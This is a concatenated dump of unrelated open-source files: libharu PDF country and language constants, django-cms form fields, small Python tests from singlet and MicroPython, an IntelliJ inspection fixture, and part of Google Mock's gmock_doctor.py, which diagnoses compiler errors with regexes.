HPDF_COUNTRY_TJ ="TJ" # TAJIKISTAN
HPDF_COUNTRY_TZ ="TZ" # TANZANIA, UNITED REPUBLIC OF
HPDF_COUNTRY_TH ="TH" # THAILAND
HPDF_COUNTRY_TG ="TG" # TOGO
HPDF_COUNTRY_TK ="TK" # TOKELAU
HPDF_COUNTRY_TO ="TO" # TONGA
HPDF_COUNTRY_TT ="TT" # TRINIDAD AND TOBAGO
HPDF_COUNTRY_TN ="TN" # TUNISIA
HPDF_COUNTRY_TR ="TR" # TURKEY
HPDF_COUNTRY_TM ="TM" # TURKMENISTAN
HPDF_COUNTRY_TC ="TC" # TURKS AND CAICOS ISLANDS
HPDF_COUNTRY_TV ="TV" # TUVALU
HPDF_COUNTRY_UG ="UG" # UGANDA
HPDF_COUNTRY_UA ="UA" # UKRAINE
HPDF_COUNTRY_AE ="AE" # UNITED ARAB EMIRATES
HPDF_COUNTRY_GB ="GB" # UNITED KINGDOM
HPDF_COUNTRY_US ="US" # UNITED STATES
HPDF_COUNTRY_UM ="UM" # UNITED STATES MINOR OUTLYING ISLANDS
HPDF_COUNTRY_UY ="UY" # URUGUAY
HPDF_COUNTRY_UZ ="UZ" # UZBEKISTAN
HPDF_COUNTRY_VU ="VU" # VANUATU
HPDF_COUNTRY_VA ="VA" # VATICAN CITY STATE (HOLY SEE)
HPDF_COUNTRY_VE ="VE" # VENEZUELA
HPDF_COUNTRY_VN ="VN" # VIET NAM
HPDF_COUNTRY_VG ="VG" # VIRGIN ISLANDS (BRITISH)
HPDF_COUNTRY_VI ="VI" # VIRGIN ISLANDS (U.S.)
HPDF_COUNTRY_WF ="WF" # WALLIS AND FUTUNA ISLANDS
HPDF_COUNTRY_EH ="EH" # WESTERN SAHARA
HPDF_COUNTRY_YE ="YE" # YEMEN
HPDF_COUNTRY_YU ="YU" # YUGOSLAVIA
HPDF_COUNTRY_ZR ="ZR" # ZAIRE
HPDF_COUNTRY_ZM ="ZM" # ZAMBIA
HPDF_COUNTRY_ZW ="ZW" # ZIMBABWE
#----------------------------------------------------------------------------
#----- lang code definition -------------------------------------------------
HPDF_LANG_AA ="aa" # Afar
HPDF_LANG_AB ="ab" # Abkhazian
HPDF_LANG_AF ="af" # Afrikaans
HPDF_LANG_AM ="am" # Amharic
HPDF_LANG_AR ="ar" # Arabic
HPDF_LANG_AS ="as" # Assamese
HPDF_LANG_AY ="ay" # Aymara
HPDF_LANG_AZ ="az" # Azerbaijani
HPDF_LANG_BA ="ba" # Bashkir
HPDF_LANG_BE ="be" # Byelorussian
HPDF_LANG_BG ="bg" # Bulgarian
HPDF_LANG_BH ="bh" # Bihari
HPDF_LANG_BI ="bi" # Bislama
HPDF_LANG_BN ="bn" # Bengali Bangla
HPDF_LANG_BO ="bo" # Tibetan
HPDF_LANG_BR ="br" # Breton
HPDF_LANG_CA ="ca" # Catalan
HPDF_LANG_CO ="co" # Corsican
HPDF_LANG_CS ="cs" # Czech
HPDF_LANG_CY ="cy" # Welsh
HPDF_LANG_DA ="da" # Danish
HPDF_LANG_DE ="de" # German
HPDF_LANG_DZ ="dz" # Bhutani
HPDF_LANG_EL ="el" # Greek
HPDF_LANG_EN ="en" # English
HPDF_LANG_EO ="eo" # Esperanto
HPDF_LANG_ES ="es" # Spanish
HPDF_LANG_ET ="et" # Estonian
HPDF_LANG_EU ="eu" # Basque
HPDF_LANG_FA ="fa" # Persian
HPDF_LANG_FI ="fi" # Finnish
HPDF_LANG_FJ ="fj" # Fiji
HPDF_LANG_FO ="fo" # Faeroese
HPDF_LANG_FR ="fr" # French
HPDF_LANG_FY ="fy" # Frisian
HPDF_LANG_GA ="ga" # Irish
HPDF_LANG_GD ="gd" # Scots Gaelic
HPDF_LANG_GL ="gl" # Galician
HPDF_LANG_GN ="gn" # Guarani
HPDF_LANG_GU ="gu" # Gujarati
HPDF_LANG_HA ="ha" # Hausa
HPDF_LANG_HI ="hi" # Hindi
HPDF_LANG_HR ="hr" # Croatian
HPDF_LANG_HU ="hu" # Hungarian
HPDF_LANG_HY ="hy" # Armenian
HPDF_LANG_IA ="ia" # Interlingua
HPDF_LANG_IE ="ie" # Interlingue
HPDF_LANG_IK ="ik" # Inupiak
HPDF_LANG_IN ="in" # Indonesian
HPDF_LANG_IS ="is" # Icelandic
HPDF_LANG_IT ="it" # Italian
HPDF_LANG_IW ="iw" # Hebrew
HPDF_LANG_JA ="ja" # Japanese
HPDF_LANG_JI ="ji" # Yiddish
HPDF_LANG_JW ="jw" # Javanese
HPDF_LANG_KA ="ka" # Georgian
HPDF_LANG_KK ="kk" # Kazakh
HPDF_LANG_KL ="kl" # Greenlandic
HPDF_LANG_KM ="km" # Cambodian
HPDF_LANG_KN ="kn" # Kannada
HPDF_LANG_KO ="ko" # Korean
HPDF_LANG_KS ="ks" # Kashmiri
HPDF_LANG_KU ="ku" # Kurdish
HPDF_LANG_KY ="ky" # Kirghiz
HPDF_LANG_LA ="la" # Latin
HPDF_LANG_LN ="ln" # Lingala
HPDF_LANG_LO ="lo" # Laothian
HPDF_LANG_LT ="lt" # Lithuanian
HPDF_LANG_LV ="lv" # Latvian,Lettish
HPDF_LANG_MG ="mg" # Malagasy
HPDF_LANG_MI ="mi" # Maori
HPDF_LANG_MK ="mk" # Macedonian
HPDF_LANG_ML ="ml" # Malayalam
HPDF_LANG_MN ="mn" # Mongolian
HPDF_LANG_MO ="mo" # Moldavian
HPDF_LANG_MR ="mr" # Marathi
HPDF_LANG_MS ="ms" # Malay
HPDF_LANG_MT ="mt" # Maltese
HPDF_LANG_MY ="my" # Burmese
HPDF_LANG_NA ="na" # Nauru
HPDF_LANG_NE ="ne" # Nepali
HPDF_LANG_NL ="nl" # Dutch
HPDF_LANG_NO ="no" # Norwegian
HPDF_LANG_OC ="oc" # Occitan
HPDF_LANG_OM ="om" # (Afan)Oromo
HPDF_LANG_OR ="or" # Oriya
HPDF_LANG_PA ="pa" # Punjabi
HPDF_LANG_PL ="pl" # Polish
HPDF_LANG_PS ="ps" # Pashto,Pushto
HPDF_LANG_PT ="pt" # Portuguese
HPDF_LANG_QU ="qu" # Quechua
HPDF_LANG_RM ="rm" # Rhaeto-Romance
HPDF_LANG_RN ="rn" # Kirundi
HPDF_LANG_RO ="ro" # Romanian
HPDF_LANG_RU ="ru" # Russian
HPDF_LANG_RW ="rw" # Kinyarwanda
HPDF_LANG_SA ="sa" # Sanskrit
HPDF_LANG_SD ="sd" # Sindhi
HPDF_LANG_SG ="sg" # Sangro
HPDF_LANG_SH ="sh" # Serbo-Croatian
HPDF_LANG_SI ="si" # Singhalese
HPDF_LANG_SK ="sk" # Slovak
HPDF_LANG_SL ="sl" # Slovenian
HPDF_LANG_SM ="sm" # Samoan
HPDF_LANG_SN ="sn" # Shona
HPDF_LANG_SO ="so" # Somali
HPDF_LANG_SQ ="sq" # Albanian
HPDF_LANG_SR ="sr" # Serbian
HPDF_LANG_SS ="ss" # Siswati
HPDF_LANG_ST ="st" # Sesotho
HPDF_LANG_SU ="su" # Sundanese
HPDF_LANG_SV ="sv" # Swedish
HPDF_LANG_SW ="sw" # Swahili
HPDF_LANG_TA ="ta" # Tamil
HPDF_LANG_TE ="te" # Tegulu
HPDF_LANG_TG ="tg" # Tajik
HPDF_LANG_TH ="th" # Thai
HPDF_LANG_TI ="ti" # Tigrinya
HPDF_LANG_TK ="tk" # Turkmen
HPDF_LANG_TL ="tl" # Tagalog
HPDF_LANG_TN ="tn" # Setswanato Tonga
HPDF_LANG_TR ="tr" # Turkish
HPDF_LANG_TS ="ts" # Tsonga
HPDF_LANG_TT ="tt" # Tatar
HPDF_LANG_TW ="tw" # Twi
HPDF_LANG_UK ="uk" # Ukrainian
HPDF_LANG_UR ="ur" # Urdu
HPDF_LANG_UZ ="uz" # Uzbek
HPDF_LANG_VI ="vi" # Vietnamese
HPDF_LANG_VO ="vo" # Volapuk
HPDF_LANG_WO ="wo" # Wolof
HPDF_LANG_XH ="xh" # Xhosa
HPDF_LANG_YO ="yo" # Yoruba
HPDF_LANG_ZH ="zh" # Chinese
HPDF_LANG_ZU ="zu" # Zulu
#----------------------------------------------------------------------------
#----- Graphis mode ---------------------------------------------------------
HPDF_GMODE_PAGE_DESCRIPTION =0x0001
HPDF_GMODE_PATH_OBJECT =0x0002
HPDF_GMODE_TEXT_OBJECT =0x0004
HPDF_GMODE_CLIPPING_PATH =0x0008
HPDF_GMODE_SHADING =0x0010
HPDF_GMODE_INLINE_IMAGE =0x0020
HPDF_GMODE_EXTERNAL_OBJECT =0x0040
|
qnub/django-cms | refs/heads/develop | cms/forms/fields.py | 35 | # -*- coding: utf-8 -*-
import six
from django import forms
from django.contrib.admin.widgets import RelatedFieldWidgetWrapper
from django.forms.fields import EMPTY_VALUES
from django.utils.translation import ugettext_lazy as _
from cms.forms.utils import get_site_choices, get_page_choices
from cms.forms.widgets import PageSelectWidget, PageSmartLinkWidget
from cms.models.pagemodel import Page
class SuperLazyIterator(object):
def __init__(self, func):
self.func = func
def __iter__(self):
return iter(self.func())
class LazyChoiceField(forms.ChoiceField):
def _set_choices(self, value):
# we overwrite this function so no list(value) is called
self._choices = self.widget.choices = value
choices = property(forms.ChoiceField._get_choices, _set_choices)
class PageSelectFormField(forms.MultiValueField):
widget = PageSelectWidget
default_error_messages = {
'invalid_site': _(u'Select a valid site'),
'invalid_page': _(u'Select a valid page'),
}
def __init__(self, queryset=None, empty_label=u"---------", cache_choices=False,
required=True, widget=None, to_field_name=None, limit_choices_to=None,
*args, **kwargs):
errors = self.default_error_messages.copy()
if 'error_messages' in kwargs:
errors.update(kwargs['error_messages'])
site_choices = SuperLazyIterator(get_site_choices)
page_choices = SuperLazyIterator(get_page_choices)
self.limit_choices_to = limit_choices_to
kwargs['required'] = required
fields = (
LazyChoiceField(choices=site_choices, required=False, error_messages={'invalid': errors['invalid_site']}),
LazyChoiceField(choices=page_choices, required=False, error_messages={'invalid': errors['invalid_page']}),
)
super(PageSelectFormField, self).__init__(fields, *args, **kwargs)
def compress(self, data_list):
if data_list:
page_id = data_list[1]
if page_id in EMPTY_VALUES:
if not self.required:
return None
raise forms.ValidationError(self.error_messages['invalid_page'])
return Page.objects.get(pk=page_id)
return None
def _has_changed(self, initial, data):
is_empty = data and (len(data) >= 2 and data[1] in [None, ''])
if isinstance(self.widget, RelatedFieldWidgetWrapper):
self.widget.decompress = self.widget.widget.decompress
if is_empty and initial is None:
# when empty data will have [u'1', u'', u''] as value
# this will cause django to always return True because of the '1'
# so we simply follow django's default behavior when initial is None and data is "empty"
data = ['' for x in range(0, len(data))]
return super(PageSelectFormField, self)._has_changed(initial, data)
class PageSmartLinkField(forms.CharField):
widget = PageSmartLinkWidget
def __init__(self, max_length=None, min_length=None, placeholder_text=None,
ajax_view=None, *args, **kwargs):
self.placeholder_text = placeholder_text
widget = self.widget(ajax_view=ajax_view)
super(PageSmartLinkField, self).__init__(max_length, min_length,
widget=widget, *args, **kwargs)
def widget_attrs(self, widget):
attrs = super(PageSmartLinkField, self).widget_attrs(widget)
attrs.update({'placeholder_text': six.text_type(self.placeholder_text)})
return attrs
|
iosonofabio/singlet | refs/heads/master | test/counts_table/test_initialize.py | 1 | #!/usr/bin/env python
# vim: fdm=indent
'''
author: Fabio Zanini
date: 15/08/17
content: Test CountsTable class.
'''
def test_initialize():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv')
def test_initialize_fromdataset():
from singlet.counts_table import CountsTable
ct = CountsTable.from_datasetname('example_dataset')
def test_initialize_128():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float128')
def test_initialize_32():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float32')
def test_initialize_16():
from singlet.counts_table import CountsTable
ct = CountsTable.from_tablename('example_table_tsv_float16')
|
iabdalkader/micropython | refs/heads/master | tests/basics/getattr.py | 18 | # test __getattr__
class A:
def __init__(self, d):
self.d = d
def __getattr__(self, attr):
return self.d[attr]
a = A({'a':1, 'b':2})
print(a.a, a.b)
# test that any exception raised in __getattr__ propagates out
class A:
def __getattr__(self, attr):
if attr == "value":
raise ValueError(123)
else:
raise AttributeError(456)
a = A()
try:
a.value
except ValueError as er:
print(er)
try:
a.attr
except AttributeError as er:
print(er)
|
siosio/intellij-community | refs/heads/master | python/testData/inspections/PyFinalInspection/SubclassingFinalClass/a.py | 12 | from b import A
class <warning descr="'A' is marked as '@final' and should not be subclassed">B</warning>(A):
pass |
evadeflow/gmock | refs/heads/master | scripts/gmock_doctor.py | 163 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts compiler's errors in code using Google Mock to plain English."""
__author__ = '[email protected] (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_EMAIL = '[email protected]'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgPointee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in the compiler's errors.
_GCC_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(\d+:)?\s+'
_CLANG_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(?P<column>\d+):\s+'
_CLANG_NON_GMOCK_FILE_LINE_RE = (
r'(?P<file>.*[/\\^](?!gmock-)[^/\\]+):(?P<line>\d+):(?P<column>\d+):\s+')
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, diagnoses, msg):
"""Diagnoses the given disease by pattern matching.
Can provide different diagnoses for different patterns.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
diagnoses: A list of pairs (regex, pattern for formatting the diagnosis
for matching regex).
msg: Compiler's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
for regex, diagnosis in diagnoses:
if re.search(regex, msg):
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by the compiler."""
gcc_regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
clang_regex = (r'error:.*array.*negative.*\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of function template specialization '
r'\'testing::internal::ReturnAction<(?P<type>.*)>'
r'::operator Action<.*>\' requested here')
diagnosis = """
You are using a Return() action in a function that returns a reference to
%(type)s. Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'a type'})],
msg)
def _NeedToReturnSomethingDiagnoser(msg):
"""Diagnoses the NRS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
clang_regex1 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'Result\' \(aka \'(?P<return_type>.*)\'\) '
r'with an rvalue of type \'void\'')
clang_regex2 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'(?P<return_type>.*)\' '
r'with an rvalue of type \'void\'')
diagnosis = """
You are using an action that returns void, but it needs to return
%(return_type)s. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser(
'NRS',
'Need to Return Something',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
clang_regex1 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(?P<return_type>.*)>'
r'::operator Action<void \(.*\)>\' requested here')
clang_regex2 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::DoBothAction<.*>'
r'::operator Action<(?P<return_type>.*) \(.*\)>\' '
r'requested here')
diagnosis = """
You are using an action that returns %(return_type)s, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser(
'NRN',
'Need to Return Nothing',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
clang_regex = (r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to an incomplete type '
r'\'(?P<type>.*)( const)?\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of member function '
r'\'testing::internal2::TypeWithoutFormatter<.*>::'
r'PrintValue\' requested here')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for call to '
r'\'Invoke\(<unresolved overloaded function type>')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching '
r'function for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-\w+-actions\.h:\d+:\d+:\s+'
r'note: candidate template ignored:\s+'
r'couldn\'t infer template argument \'FunctionImpl\'')
diagnosis = """
Function you are passing to Invoke is overloaded. Please tell your compiler
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedMethodActionDiagnoser(msg):
"""Diagnoses the OMA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function '
r'type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function '
r'for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-\w+-actions\.h:\d+:\d+: '
r'note: candidate function template not viable: '
r'requires .*, but 2 (arguments )?were provided')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: member reference type '
r'\'(?P<class_name>.*?) *\' is a pointer; '
r'maybe you meant to use \'->\'\?')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser(
'MOP',
'Mock Object Pointer',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis % {'mock_object': 'mock_object',
'method': 'method',
'class_name': '%(class_name)s'})],
msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
clang_regex = (_CLANG_FILE_LINE_RE +
r'error: (use of undeclared identifier|unknown type name|'
r'no template named) \'(?P<symbol>[^\']+)\'')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in (list(_FindAllMatches(gcc_regex, msg)) +
list(_FindAllMatches(clang_regex, msg))):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by the compiler."""
gcc_regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'ImplicitCast_\('
r'(:?long )?int&\)')
clang_regex = (r'\bgmock-actions.h:.* error: no matching function for '
r'call to \'ImplicitCast_\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(int|long)>::operator '
r'Action<(?P<type>.*)\(\)>\' requested here')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into %(type)s. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser(
'NRNULL', 'Need to use ReturnNull',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'the right type'})],
msg)
def _TypeInTemplatedBaseDiagnoser(msg):
"""Diagnoses the TTB disease, given the error messages by the compiler."""
# This version works when the type is used as the mock function's return
# type.
gcc_4_3_1_regex_type_in_retval = (
r'In member function \'int .*\n' + _GCC_FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex_type_in_retval = (
r'error: a function call cannot appear in a constant-expression'
+ _GCC_FILE_LINE_RE + r'error: template argument 1 is invalid\n')
# This version works when the type is used as the mock function's sole
# parameter type.
gcc_regex_type_of_sole_param = (
_GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
# This version works when the type is used as a parameter of a mock
# function that has multiple parameters.
gcc_regex_type_of_a_param = (
r'error: expected `;\' before \'::\' token\n'
+ _GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
clang_regex_type_of_retval_or_sole_param = (
_CLANG_FILE_LINE_RE +
r'error: use of undeclared identifier \'(?P<type>.*)\'\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):\d+: error: '
r'non-friend class member \'Result\' cannot have a qualified name'
)
clang_regex_type_of_a_param = (
_CLANG_FILE_LINE_RE +
r'error: C\+\+ requires a type specifier for all declarations\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: '
r'C\+\+ requires a type specifier for all declarations'
)
clang_regex_unknown_type = (
_CLANG_FILE_LINE_RE +
r'error: unknown type name \'(?P<type>[^\']+)\''
)
diagnosis = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
for diag in _GenericDiagnoser(
'TTB', 'Type in Template Base',
[(gcc_4_3_1_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_4_4_0_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_regex_type_of_sole_param, diagnosis),
(gcc_regex_type_of_a_param, diagnosis),
(clang_regex_type_of_retval_or_sole_param, diagnosis),
(clang_regex_type_of_a_param, diagnosis % {'type': 'Foo'})],
msg):
yield diag
# Avoid overlap with the NUS pattern.
for m in _FindAllMatches(clang_regex_unknown_type, msg):
type_ = m.groupdict()['type']
if type_ not in _COMMON_GMOCK_SYMBOLS:
yield ('TTB', 'Type in Template Base', diagnosis % m.groupdict())
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error:.*array.*negative.*r?\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: too few arguments '
r'to function call, expected (?P<args>\d+), '
r'have (?P<wrong_args>\d+)')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
